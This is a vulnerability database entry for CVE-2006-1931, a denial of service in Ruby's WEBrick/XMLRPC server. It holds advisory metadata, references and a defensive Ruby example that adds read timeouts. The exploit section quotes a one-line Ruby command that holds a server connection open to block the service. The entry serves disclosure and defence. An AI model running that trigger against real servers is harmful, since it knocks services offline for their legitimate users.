Ruby XMLRPC Server Denial of Service Vulnerability

Vulnerability ID 1110115 Vulnerability type Design error
Published 2006-04-21 Updated 2006-12-14
CVE ID CVE-2006-1931 CNNVD ID CNNVD-200604-376
Platform Linux CVSS score 5.0
|Sources
https://www.exploit-db.com/exploits/27723
https://www.securityfocus.com/bid/17645
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-376
|Details
The HTTP/XMLRPC server in Ruby before 1.8.2 uses blocking sockets, which allows attackers to cause a denial of service (blocked connection) via a large amount of data.
|Exploit
source: http://www.securityfocus.com/bid/17645/info

Ruby is affected by a denial-of-service vulnerability in the WEBrick HTTP server. This issue is due to the use of blocking network operations. Ruby's implementation of XML/RPC is also affected, since it uses the vulnerable WEBrick server.

This issue allows remote attackers to cause affected webservers to fail to respond to further legitimate requests.

Ruby versions prior to 1.8.3 are affected by this issue.

The following Ruby command will issue a request sufficient to trigger this issue:

ruby -rsocket -e 'TCPSocket.open("www.example.com", 10080) {|s|
s.print "GET /z HTTP/1.0\r\n\r\n"
sleep
}'
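As an added example (not part of the advisory and not Ruby's own WEBrick patch), the defensive pattern behind the fix: a per-connection read deadline enforced with IO.select and read_nonblock, so a client that opens a connection and never finishes its request head is dropped instead of tying up a blocking read. The function name, timeout values and the socket-pair inputs are assumptions constructed for the demo.

```ruby
require "socket"

# Read one HTTP request head (up to the blank line) from `sock`, but give up
# if the client stalls for longer than `timeout` seconds in total. A plain
# blocking gets/read would wait forever on a client that never finishes.
def read_request_head(sock, timeout: 2.0, max_bytes: 8192)
  buf = +""
  deadline = Process.clock_gettime(Process::CLOCK_MONOTONIC) + timeout
  loop do
    remaining = deadline - Process.clock_gettime(Process::CLOCK_MONOTONIC)
    return nil if remaining <= 0                 # budget exhausted: caller closes
    # Wait only for the remaining budget, not indefinitely, for readable data.
    return nil unless IO.select([sock], nil, nil, remaining)
    begin
      chunk = sock.read_nonblock(1024)
    rescue IO::WaitReadable
      next                                       # spurious wakeup; re-check deadline
    rescue EOFError
      return nil                                 # peer closed before a full head
    end
    buf << chunk
    return nil if buf.bytesize > max_bytes       # oversized head: refuse it
    idx = buf.index("\r\n\r\n")
    return buf[0, idx + 4] if idx
  end
end

# Demo on in-process socket pairs (constructed input, no network involved):
# one client sends a complete request, the other sends a partial head and stalls.
def demo
  fast_srv, fast_cli = Socket.pair(:UNIX, :STREAM)
  fast_cli.write("GET /z HTTP/1.0\r\nHost: localhost\r\n\r\n")
  full = read_request_head(fast_srv, timeout: 1.0)

  slow_srv, slow_cli = Socket.pair(:UNIX, :STREAM)
  slow_cli.write("GET /z HTTP/1.0\r\n")            # partial head, then silence
  stalled = read_request_head(slow_srv, timeout: 0.2)

  [fast_srv, fast_cli, slow_srv, slow_cli].each(&:close)
  { full: full, stalled: stalled }
end

if __FILE__ == $0
  p demo   # the stalled connection yields nil after 0.2 s instead of hanging
end
```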
|Affected products
Yukihiro Matsumoto Ruby 1.8.2
+ Redhat Fedora Core4
+ Redhat Fedora Core3
Yukihiro Matsumoto Ruby 1.8.1 +
|References

Source: bugzilla.redhat.com
Link: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189540
Source: MISC
Link: http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-dev/27787
Source: MISC
Link: ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.2-webrick-dos-1.patch
Source: XF
Name: ruby-socket-dos(26102)
Link: http://xforce.iss.net/xforce/xfdb/26102
Source: UBUNTU
Name: USN-273-1
Link: http://www.ubuntulinux.org/support/documentation/usn/usn-273-1
Source: BID
Name: 17645
Link: http://www.securityfocus.com/bid/17645
Source: REDHAT
Name: RHSA-2006:0427
Link: http://www.redhat.com/support/errata/RHSA-2006-0427.html
Source: OSVDB
Name: 24972
Link: http://www.osvdb.org/24972
Source: SUSE
Name: SUSE-SR:2006:012
Link: http://www.novell.com/linux/security/advisories/2006-06-02.html
Source: MANDRIVA
Name: MDKSA-2006:079
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2006:079
Source: GENTOO
Name: GLSA-200605-11
Link: http://www.gentoo.org/security/en/glsa/glsa-200605-11.xml
Source: DEBIAN
Name: DSA-1157
Link: http://www.debian.org/security/2006/dsa-1157
Source: SECTRACK
Name: 1015978
Link: http://securitytracker.